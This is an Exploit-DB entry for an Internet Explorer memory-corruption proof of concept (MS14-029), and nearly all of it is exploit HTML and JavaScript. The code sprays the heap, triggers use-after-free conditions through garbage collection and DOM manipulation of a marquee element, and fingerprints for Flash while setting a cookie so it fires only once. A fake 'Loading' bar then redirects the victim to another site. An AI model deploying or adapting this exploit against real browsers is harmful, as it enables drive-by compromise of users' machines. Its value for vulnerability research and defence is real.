Microsoft Internet Explorer - Memory Corruption (PoC) (MS14-029)

EDB-ID:

34458




Platform:

Windows

Date:

2014-08-28


<!doctype html>
<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache"/>
<sc​ript >
func​tion stc()
{
var Then = new Date();
Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 7 );
document.cookie = "Cookie1=d93kaj3Nja3; expires="+ Then.toGMTString();
}
func​tion cid()
{
var swf = 0;
try {
swf = new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); } catch (e) {
}
if (!swf)
return 0;
var cookieString = new String(document.cookie);
if(cookieString.indexOf("d93kaj3Nja3") == -1)
{stc(); return 1;}else{ return 0;}
}
String.prototype.repeat=func​tion (i){return new Array(isNaN(i)?1:++i).join(this);}
var tpx=un​escape ("%u1414%u1414").repeat(0x60/4-1);
var ll=new Array();
for (i=0;i<3333;i++)ll.push(document.create​Element("img"));
for(i=0;i<3333;i++) ll[i].className=tpx;
for(i=0;i<3333;i++) ll[i].className="";
CollectGarbage();
func​tion b2()
{
try{xdd.re​placeNode(document.createTextNode(" "));}catch(exception){}
try{xdd.outerText='';}catch(exception){}
CollectGarbage();
for(i=0;i<3333;i++) ll[i].className=tpx;
}
func​tion a1(){
if (!cid())
return;
document.body.contentEditable="true";
try{xdd.applyElement(document.create​Element("frameset"));}catch(exception){}
try{document.selection.createRange().select();}catch(exception){}
}
</ sc​ript >
</head>
<body onload='setTimeout("a1();",2000);' onresize=b2()>
<marquee id=xdd > </marquee>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1%" height="1%" id="FE">
<param name="movie" value="storm.swf" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<param name="allowScriptAccess" value="sameDomain" />
<param name="allowFullScreen" value="true" />
</object>
</body>
<body>
<form name=loading>
¡¡<p align=center> <font color="#0066ff" size="2"> Loading....,Please Wait</font> <font color="#0066ff" size="2" face="verdana"> ...</font>
¡¡¡¡<input type=text name=chart size=46 style="font-family:verdana; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;">
¡¡¡¡
¡¡¡¡<input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;">
¡¡¡¡<sc​ript > ¡¡
var bar=0¡¡
var line="||"¡¡
var amount="||"¡¡
count()¡¡
func​tion count(){¡¡
bar=bar+2¡¡
amount =amount + line¡¡
document.loading.chart.value=amount¡¡
document.loading.percent.value=bar+"%"¡¡
if (bar<99)¡¡
{setTimeout("count()",500);}¡¡
else¡¡
{window.location = "http://www.google.com.hk";}¡¡
}</ sc​ript >
¡¡</p>
</form>
<p align="center"> Wart,<a style="text-decoration: none" href="http://www.google.com.hk"> <font color="#FF0000"> kick me</font> </a> .</p>
</body>
</html>